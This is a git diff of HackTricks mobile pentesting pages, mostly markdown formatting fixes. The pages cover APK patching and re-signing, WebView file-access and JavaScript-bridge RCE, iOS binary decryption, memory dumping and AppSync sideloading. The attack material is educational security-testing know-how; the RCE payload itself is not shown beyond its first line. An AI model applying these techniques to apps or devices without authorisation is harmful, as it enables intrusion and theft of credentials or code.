 In this phase, you have to identify the **sensitive keywords** to analyze the **Javascript** code. A pattern that is popular with React Native applications, is the use of a third party services like such as Firebase, AWS s3 service endpoints, private keys etc.,
 
-During my initial **recon process**, I have observed the application using the Dialogflow service. So based on this, I have searched a pattern related to its configuration. Fortunately, I was able to find** sensitive hard-coded credentials** in the Javascript code.
+During my initial **recon process**, I have observed the application using the Dialogflow service. So based on this, I have searched a pattern related to its configuration. Fortunately, I was able to find **sensitive hard-coded credentials** in the Javascript code.
 
 ![Image for post](https://miro.medium.com/max/2086/1\*RAToFnqpp9ndM0lBeMlz6g.png)
diff --git a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md
index 4e39e23f..f1c5ef0c 100644
--- a/mobile-apps-pentesting/android-app-pentesting/smali-changes.md
+++ b/mobile-apps-pentesting/android-app-pentesting/smali-changes.md
@@ -2,7 +2,7 @@
 
 Sometimes it is interesting to modify the application code to access hidden information for you (maybe well obfuscated passwords or flags). Then, it could be interesting to decompile the apk, modify the code and recompile it.
 
-**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html)
+**Opcodes reference:** [http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html](http://pallergabor.uw.hu/androidblog/dalvik\_opcodes.html)
 
 ## Fast Way
 
@@ -73,7 +73,7 @@ zipalign -v 4 infile.apk
 
 ### **Sign the new APK (again?)**
 
-If you **prefer** to use **\*\*\[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**) **instead of jarsigner,** you should sing the apk **after applying** the optimization with **zipaling**. BUT NOTICE THAT **YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
+If you **prefer** to use **\*\*\[**apksigner**]\(**[https://developer.android.com/studio/command-line/apksigner](https://developer.android.com/studio/command-line/apksigner)**)** instead of jarsigner, **you should sing the apk** after applying **the optimization with** zipaling**. BUT NOTICE THAT** YOU ONLY HAVE TO SIGN THE APPLCIATION ONCE\*\* WITH jarsigner (before zipalign) OR WITH aspsigner(after zipaling).
 
 ```bash
 apksigner sign --ks key.jks ./dist/mycompiled.apk
diff --git a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
index 647e7ae2..ba59a66b 100644
--- a/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
+++ b/mobile-apps-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md
@@ -1,6 +1,6 @@
 # Spoofing your location in Play Store
 
-**Information copied from **[**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/)****
+**Information copied from** [**https://manifestsecurity.com/android-application-security-part-23/**](https://manifestsecurity.com/android-application-security-part-23/)****
 
 Many a times you have seen that application which you want to assess is only allowed in selected countries, so in that case you won’t be able to install that application on you android device. But if you can spoof your location to that country in which the application is allowed then you can get access to that application. Below is the procedure of the same.
 
diff --git a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md
index 266261b3..db5dfef2 100644
--- a/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md
+++ b/mobile-apps-pentesting/android-app-pentesting/webview-attacks.md
@@ -5,7 +5,7 @@
 ### File Access
 
 _WebView_ file access is enabled by default. Since API 3 (Cupcake 1.5) the method [_setAllowFileAccess()_](https://developer.android.com/reference/android/webkit/WebSettings.html#setAllowFileAccess\(boolean\)) is available for explicitly enabling or disabling it.\
-If the application has _**android.permission.READ_EXTERNAL_STORAGE** _it will be able to read and load files **from the external storage**.\
+If the application has _**android.permission.READ\_EXTERNAL\_STORAGE** _ it will be able to read and load files **from the external storage**.\
 The _WebView_ needs to use a File URL Scheme, e.g., `file://path/file`, to access the file.
 
 #### Universal Access From File URL (Deprecated)
@@ -15,16 +15,16 @@ The _WebView_ needs to use a File URL Scheme, e.g., `file://path/file`, to acces
 > **Don't** enable this setting if you open files that may be created or altered by external sources. Enabling this setting **allows malicious scripts loaded in a `file://`** context to launch cross-site scripting attacks, either **accessing arbitrary local files** including WebView cookies, app private data or even credentials used on arbitrary web sites.
 
 In summary this will **prevent loading arbitrary Origins.** The app will send the URL request lo load the content with **`Origin: file://`** if the response doesn't allow that origin (**`Access-Control-Allow-Origin: file://`**) then the content won't be loaded.\
-The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN`](https://developer.android.com/reference/android/os/Build.VERSION_CODES#JELLY_BEAN) and above.
+The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN`](https://developer.android.com/reference/android/os/Build.VERSION\_CODES#JELLY\_BEAN) and above.
 
 * Use [`getAllowUniversalAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowUniversalAccessFromFileURLs\(\)) to know whether JavaScript running in the context of a file scheme URL can access content from any origin (if UniversalAccessFromFileURL is enabled).
 * Use [`setAllowUniversalAccessFromFileURLs(boolean)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowUniversalAccessFromFileURLs\(boolean\)) to enable/disable it.
 
 {% hint style="info" %}
-Using **`loadDataWithBaseURL()`** with `null` as baseURL will also **prevent to load local files **even if all the dangerous settings are enabled.
+Using **`loadDataWithBaseURL()`** with `null` as baseURL will also **prevent to load local files** even if all the dangerous settings are enabled.
 {% endhint %}
 
-#### File Access From File URLs (Deprecated) <a href="getallowfileaccessfromfileurls" id="getallowfileaccessfromfileurls"></a>
+#### File Access From File URLs (Deprecated) <a href="#getallowfileaccessfromfileurls" id="getallowfileaccessfromfileurls"></a>
 
 > Sets whether cross-origin requests in the context of a file scheme URL should be allowed to access content from other file scheme URLs. Note that some accesses such as image HTML elements don't follow same-origin rules and aren't affected by this setting.
 >
@@ -32,17 +32,17 @@ Using **`loadDataWithBaseURL()`** with `null` as baseURL will also **prevent to
 
 In summary, this prevents javascript to access local files via `file://` protocol.\
 Note that **the value of this setting is ignored** if the value of [`getAllowUniversalAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowUniversalAccessFromFileURLs\(\)) is `true`. \
-The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN`](https://developer.android.com/reference/android/os/Build.VERSION_CODES#JELLY_BEAN) and above.
+The **default value is `false`** when targeting [`Build.VERSION_CODES.JELLY_BEAN`](https://developer.android.com/reference/android/os/Build.VERSION\_CODES#JELLY\_BEAN) and above.
 
 * Use [`getAllowFileAccessFromFileURLs()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccessFromFileURLs\(\)) to know whether JavaScript is running in the context of a file scheme URL can access content from other file scheme URLs.
 * Use [`setAllowFileAccessFromFileURLs(boolen)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccessFromFileURLs\(boolean\))to enable/disable it.
 
 #### File Access
 
-> Enables or disables **file access within WebView**. Note that this enables or disables file system access only. Assets and resources are still accessible using file:///android_asset and file:///android_res.
+> Enables or disables **file access within WebView**. Note that this enables or disables file system access only. Assets and resources are still accessible using file:///android\_asset and file:///android\_res.
 
 In summary, if disable, the WebView won't be able to load a local file with the `file://` protocol.\
-The **default value is`false`** when targeting [`Build.VERSION_CODES.R`](https://developer.android.com/reference/android/os/Build.VERSION_CODES#R) and above.
+The **default value is`false`** when targeting [`Build.VERSION_CODES.R`](https://developer.android.com/reference/android/os/Build.VERSION\_CODES#R) and above.
 
 * Use [`getAllowFileAccess()`](https://developer.android.com/reference/android/webkit/WebSettings#getAllowFileAccess\(\)) to know if the configuration is enabled.
 * Use [`setAllowFileAccess(boolean)`](https://developer.android.com/reference/android/webkit/WebSettings#setAllowFileAccess\(boolean\)) to enable/disable it.
@@ -99,13 +99,13 @@ Note that in the case of trying to exploit this vulnerability via an **Open Redi
 
 If `addJavascriptInterface` is necessary, take the following considerations:
 
-* **Only JavaScript provided **with the APK should be allowed to use the bridges, e.g. by verifying the URL on each bridged Java method (via `WebView.getUrl`).
+* **Only JavaScript provided** with the APK should be allowed to use the bridges, e.g. by verifying the URL on each bridged Java method (via `WebView.getUrl`).
 * **No JavaScript should be loaded from remote endpoint**s, e.g. by keeping page navigation within the app's domains and opening all other domains on the default browser (e.g. Chrome, Firefox).
 * If necessary for legacy reasons (e.g. having to support older devices), **at least set the minimal API level to 17** in the manifest file of the app (`<uses-sdk android:minSdkVersion="17" />`).
 
 ### Javascript Bridge to RCE via Reflection
 
-As noted in [**this research **](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_)** **once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
+As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) **** once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
 
 ```markup
 <!-- javascriptBridge is the name of the Android exposed object -->
@@ -127,7 +127,7 @@ In that scenario, you won't be able to abuse Reflection to execute arbitrary cod
 
 ![](<../../.gitbook/assets/image (525).png>)
 
-Select **inspect** and a new window will be opened. In this Windows you can **interact with the content** of the **WebView** and even make it **execute arbitrary JS **code from the **console** tab:
+Select **inspect** and a new window will be opened. In this Windows you can **interact with the content** of the **WebView** and even make it **execute arbitrary JS** code from the **console** tab:
 
 ![](<../../.gitbook/assets/image (526).png>)
 
diff --git a/mobile-apps-pentesting/android-checklist.md b/mobile-apps-pentesting/android-checklist.md
index 0d9703f9..3bbc33e3 100644
--- a/mobile-apps-pentesting/android-checklist.md
+++ b/mobile-apps-pentesting/android-checklist.md
@@ -2,11 +2,11 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
 ### [Learn Android fundamentals](android-app-pentesting/#2-android-application-fundamentals)
 
@@ -64,8 +64,8 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 
 
-If you want to **know **about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**,** **join the [💬](https://emojipedia.org/speech-balloon/)** **[**PEASS & HackTricks telegram group here**](https://t.me/peass), or** follow me on Twitter **[🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-****If you want to** share some tricks with the community **you can also submit **pull requests **to** **[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks)** **that will be reflected in this book.\
+If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**PEASS & HackTricks telegram group here**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
 Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
 
 ![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (5).png>)
diff --git a/mobile-apps-pentesting/ios-pentesting-checklist.md b/mobile-apps-pentesting/ios-pentesting-checklist.md
index 497e2f4b..768c07d5 100644
--- a/mobile-apps-pentesting/ios-pentesting-checklist.md
+++ b/mobile-apps-pentesting/ios-pentesting-checklist.md
@@ -2,17 +2,17 @@
 
 {% hint style="danger" %}
 Do you use **Hacktricks every day**? Did you find the book **very** **useful**? Would you like to **receive extra help** with cybersecurity questions? Would you like to **find more and higher quality content on Hacktricks**?\
-[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop)** so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
+[**Support Hacktricks through github sponsors**](https://github.com/sponsors/carlospolop) **so we can dedicate more time to it and also get access to the Hacktricks private group where you will get the help you need and much more!**
 {% endhint %}
 
-If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks **or** PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
-If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to** give ⭐** on **github** to **motivate** **me** to continue developing this book.
+If you want to know about my **latest modifications**/**additions** or you have **any suggestion for HackTricks** or **PEASS**, **join the** [**💬**](https://emojipedia.org/speech-balloon/)[**telegram group**](https://t.me/peass), or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
+If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book and don't forget to **give ⭐** on **github** to **motivate** **me** to continue developing this book.
 
 ### Preparation
 
 * [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md)****
-* [ ] Prepare your environment reading** **[**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
-* [ ] Read all the sections of** **[**iOS Initial Analysis**](ios-pentesting/#initial-analysis)** **to learn common actions to pentest an iOS application
+* [ ] Prepare your environment reading **** [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md)****
+* [ ] Read all the sections of **** [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) **** to learn common actions to pentest an iOS application
 
 ### Data Storage
 
@@ -62,15 +62,15 @@ If you want to **share some tricks with the community** you can also submit **pu
 
 * ****[**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes)****
   * [ ] Check if the application is **registering any protocol/scheme**
-  * [ ] Check if the application is **registering to use **any protocol/scheme
+  * [ ] Check if the application is **registering to use** any protocol/scheme
   * [ ] Check if the application **expects to receive any kind of sensitive information** from the custom scheme that can be **intercepted** by the another application registering the same scheme
   * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited**
-  * [ ] Check if the application **exposes any sensitive action **that can be called from anywhere via the custom scheme
+  * [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme
 * ****[**Universal Links**](ios-pentesting/#universal-links)****
   * [ ] Check if the application is **registering any universal protocol/scheme**
-  * [ ] Check the** `apple-app-site-association` **file
+  * [ ] Check the ** `apple-app-site-association` ** file
   * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited**
-  * [ ] Check if the application **exposes any sensitive action **that can be called from anywhere via the custom scheme
+  * [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme
 * ****[**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md)****
   * [ ] Check if the application can receive UIActivities and if it's possible to exploit any vulnerability with specially crafted activity
 * ****[**UIPasteboard**](ios-pentesting/ios-uipasteboard.md)****
diff --git a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md
index 88efe667..9e467e0a 100644
--- a/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md
+++ b/mobile-apps-pentesting/ios-pentesting/basic-ios-testing-operations.md
@@ -6,7 +6,7 @@
 Perform this actions having **connected** the device to the computer via **USB** and having the **device** **unlocked**.
 {% endhint %}
 
-The UDID is a 40-digit unique sequence of letters and numbers to identify an iOS device. You can find the UDID of your iOS device on macOS Catalina onwards in the **Finder app**, as iTunes is not available anymore in Catalina. Just select the connected iOS device in Finder and** click on the information under the name of the iOS** device to iterate through it. Besides the UDID, you can find the serial number, IMEI and other useful information.
+The UDID is a 40-digit unique sequence of letters and numbers to identify an iOS device. You can find the UDID of your iOS device on macOS Catalina onwards in the **Finder app**, as iTunes is not available anymore in Catalina. Just select the connected iOS device in Finder and **click on the information under the name of the iOS** device to iterate through it. Besides the UDID, you can find the serial number, IMEI and other useful information.
 
 ![](<../../.gitbook/assets/image (471).png>)
 
@@ -27,7 +27,7 @@ It is also possible to get the UDID via various command line tools on macOS whil
       $ idevice_id -l
       316f01bd160932d2bf2f95f1f142bc29b1c62dbc
     ```
-*   By using the system_profiler:
+*   By using the system\_profiler:
 
     ```bash
       $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep "Serial Number:"
@@ -75,7 +75,7 @@ $ iproxy 2222 22
 waiting for connection
 ```
 
-The above command maps port `22` on the iOS device to port `2222` on localhost. You can also [make iproxy run automatically in the background](https://iphonedevwiki.net/index.php/SSH_Over_USB) if you don't want to run the binary every time you want to SSH over USB.
+The above command maps port `22` on the iOS device to port `2222` on localhost. You can also [make iproxy run automatically in the background](https://iphonedevwiki.net/index.php/SSH\_Over\_USB) if you don't want to run the binary every time you want to SSH over USB.
 
 With the following command in a new terminal window, you can connect to the device:
 
@@ -89,7 +89,7 @@ iPhone:~ root#
 
 ### On-device Shell App
 
-While usually using an **on-device shell **(terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or check some configuration. For example, you can install [NewTerm 2](https://repo.chariz.io/package/ws.hbang.newterm2/) via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
+While usually using an **on-device shell** (terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or check some configuration. For example, you can install [NewTerm 2](https://repo.chariz.io/package/ws.hbang.newterm2/) via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
 
 In addition, there are a few jailbreaks that explicitly disable incoming SSH _for security reasons_. In those cases, it is very convenient to have an on-device shell app, which you can use to first SSH out of the device with a reverse shell, and then connect from your host computer to it.
 
@@ -139,7 +139,7 @@ $ scp -P 2222 root@localhost:/tmp/data.tgz .
 Another GUI tool for this purpose is [**iExplorer**](https://macroplant.com/iexplorer).
 
 {% hint style="info" %}
-Starting in iOS version 8.4, Apple has** restricted the third-party managers to access to the application sandbox**, so tools like iFunbox and iExplorer no longer display/retrieve files from apps installed on the device if the device isn't jailbroken.
+Starting in iOS version 8.4, Apple has **restricted the third-party managers to access to the application sandbox**, so tools like iFunbox and iExplorer no longer display/retrieve files from apps installed on the device if the device isn't jailbroken.
 {% endhint %}
 
 ### Using Objection
@@ -206,7 +206,7 @@ Save the IPA file locally with the following command:
 ### Decryption (Manual)
 
 Unlike an Android Application, the binary of an iOS app **can only be disassembled** and not decompiled.\
-When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary using **[**FairPlay**](https://developer.apple.com/streaming/fps/). So the binary download from the app store is encrypted complicating  ting the reverse-engineering tasks.
+When an application is submitted to the app store, Apple first verifies the app conduct and before releasing it to the app-store, **Apple encrypts the binary using** [**FairPlay**](https://developer.apple.com/streaming/fps/). So the binary download from the app store is encrypted complicating  ting the reverse-engineering tasks.
 
 However, note that there are other **third party software that can be used to obfuscate** the resulting binaries.
 
@@ -222,7 +222,7 @@ Mach header
 MH_MAGIC_64   X86_64        ALL  0x00     EXECUTE    47       6080   NOUNDEFS DYLDLINK TWOLEVEL PIE
 ```
 
-If it's set you can use the script [`change_macho_flags.py`](https://chromium.googlesource.com/chromium/src/+/49.0.2623.110/build/mac/change_mach_o_flags.py) to remove it with python2:
+If it's set you can use the script [`change_macho_flags.py`](https://chromium.googlesource.com/chromium/src/+/49.0.2623.110/build/mac/change\_mach\_o\_flags.py) to remove it with python2:
 
 ```bash
 python change_mach_o_flags.py --no-pie Original_App
@@ -255,7 +255,7 @@ otool -l Original_App | grep -A 4 LC_ENCRYPTION_INFO
 The value of **`cryptoff`** indicated the starting address of the encrypted content and the **`cryptsize`** indicates the size of the encrypted content.
 
 So, the `start address` to dump will be `vmaddr + cryptoff` and the `end address` will be the `start address + cryptsize`\
-In this case: `start_address = 0x4000 + 0x4000 = 0x8000`_ _and `end_address = 0x8000 + 0x109c000 = 0x10a4000`
+In this case: `start_address = 0x4000 + 0x4000 = 0x8000` __ and `end_address = 0x8000 + 0x109c000 = 0x10a4000`
 
 With this information it's just necessary to run the application in the jailbroken device, attach to the process with gdb (`gdb -p <pid>`) and dump the memory:
 
@@ -319,7 +319,7 @@ After this, the `Telegram.ipa` file will be created in your current directory. Y
 
 #### flexdecrypt
 
-In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt)** **or a wrapper of the tool called** **[**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
+In order to **obtain the ipa file** from an installed application you can also use the tool [**flexdecrypt**](https://github.com/JohnCoates/flexdecrypt) **** or a wrapper of the tool called **** [**flexdump**](https://gist.github.com/defparam/71d67ee738341559c35c684d659d40ac)**.**\
 ****In any case you will need to **install flexdecrypt in the device** running something like:
 
 ```markup
@@ -345,7 +345,7 @@ See the **github** for more information.
 
 ## Installing Apps
 
-When you install an application without using Apple's App Store, this is called **sideloading**. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the **installd** **daemon**, which will **unpack** and **install** the application. To integrate app services or be installed on an iOS device, all **applications must be signed with a certificate issued by Apple**. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can **circumvent this security feature with **[**AppSync**](http://repo.hackyouriphone.org/appsyncunified), a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. **AppSync is a tweak that patches installd**, allowing the installation of fake-signed IPA packages.
+When you install an application without using Apple's App Store, this is called **sideloading**. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the **installd** **daemon**, which will **unpack** and **install** the application. To integrate app services or be installed on an iOS device, all **applications must be signed with a certificate issued by Apple**. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can **circumvent this security feature with** [**AppSync**](http://repo.hackyouriphone.org/appsyncunified), a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. **AppSync is a tweak that patches installd**, allowing the installation of fake-signed IPA packages.
 
 Different methods exist for installing an IPA package onto an iOS device, which are described in detail below.
 
@@ -433,4 +433,4 @@ It is important to note that changing this value will break the original signatu
 
 This bypass might not work if the application requires capabilities that are specific to modern iPads while your iPhone or iPod is a bit older.
 
-Possible values for the property [UIDeviceFamily](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/iPhoneOSKeys.html#//apple_ref/doc/uid/TP40009252-SW11) can be found in the Apple Developer documentation.
+Possible values for the property [UIDeviceFamily](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/iPhoneOSKeys.html#//apple\_ref/doc/uid/TP40009252-SW11) can be found in the Apple Developer documentation.
diff --git a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md
index 8ec6abb7..b8301d86 100644
--- a/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md
+++ b/mobile-apps-pentesting/ios-pentesting/burp-configuration-for-ios.md
@@ -2,7 +2,7 @@
 
 ## Burp Cert Installation in physical iOS
 
-You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing)** for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\
+You can install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/tools/mobile-assistant/installing) **for help installing the Burp Certificate, configure the proxy and perform SSL Pinning.**\
 ****Or you can manually follow the next steps:
 
 * Configure **Burp** as the iPhone **proxy in **_**Settings**_** --> **_**Wifi**_** --> **_**Click the network**_** --> **_**Proxy**_
@@ -33,7 +33,7 @@ The next step is to make a remote port forwarding of port 8080 on the iOS device
 ssh -R 8080:localhost:8080 root@localhost -p 2222
 ```
 
-You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to **127.0.0.1:8080 **and you should see the Burp Suite Page. This would also be a good time to [install the CA certificate](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device) of Burp on your iOS device.
+You should now be able to reach Burp on your iOS device. Open Safari on iOS and go to **127.0.0.1:8080** and you should see the Burp Suite Page. This would also be a good time to [install the CA certificate](https://support.portswigger.net/customer/portal/articles/1841109-installing-burp-s-ca-certificate-in-an-ios-device) of Burp on your iOS device.
 
 The last step would be to set the proxy globally on your iOS device:
 
@@ -92,7 +92,7 @@ In _Proxy_ --> _Options_ --> _Export CA certificate_ --> _Certificate in DER for
 
 Steps to configure Burp as proxy:
 
-* Go to _System Preferences _--> _Network_ --> _Advanced_
+* Go to _System Preferences_ --> _Network_ --> _Advanced_
 * In _Proxies_ tab mark _Web Proxy (HTTP)_ and _Secure Web Proxy (HTTPS)_
 * In both options configure _127.0.0.1:8080_
 
diff --git a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
index 528942b8..0a9730a5 100644
--- a/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
+++ b/mobile-apps-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md
@@ -1,6 +1,6 @@
 # Extracting Entitlements From Compiled Application
 
-**Page copied form **[**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links)****
+**Page copied form** [**https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links**](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06h-testing-platform-interaction#universal-links)****
 
 If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find `.entitlements` files. This could be also the case for the `embedded.mobileprovision` file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the "iOS Basic Security Testing" chapter, section "Acquiring the App Binary").
 
diff --git a/mobile-apps-pentesting/ios-pentesting/frida-configuration-in-ios.md b/mobile-apps-pentesting/ios-pentesting/frida-configuration-in-ios.md
index 88ff2b06..8cd7f26e 100644
--- a/mobile-apps-pentesting/ios-pentesting/frida-configuration-in-ios.md
+++ b/mobile-apps-pentesting/ios-pentesting/frida-configuration-in-ios.md
@@ -2,8 +2,8 @@
 
 ## Installing Frida
 
-Go to **Cydia** app and add Frida’s repository by going to **Manage -> Sources -> Edit -> Add **and enter [**https://build.frida.re **](https://build.frida.re). It will add a new source in the source list. Go to the **frida** **source**, now you should **install** the **Frida** package.
+Go to **Cydia** app and add Frida’s repository by going to **Manage -> Sources -> Edit -> Add** and enter [**https://build.frida.re** ](https://build.frida.re). It will add a new source in the source list. Go to the **frida** **source**, now you should **install** the **Frida** package.
 
-![](https://miro.medium.com/max/614/0\*qSD26kBtgt_UIZk1.png)
+![](https://miro.medium.com/max/614/0\*qSD26kBtgt\_UIZk1.png)
 
 After installed, you can use in your PC the command `frida-ls-devices` and check that the device appears (your PC needs to be able to access it).
diff --git a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md
index be3a11c4..9b6b20da 100644
--- a/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md
+++ b/mobile-apps-pentesting/ios-pentesting/ios-app-extensions.md
@@ -1,6 +1,6 @@
 # iOS App Extensions
 
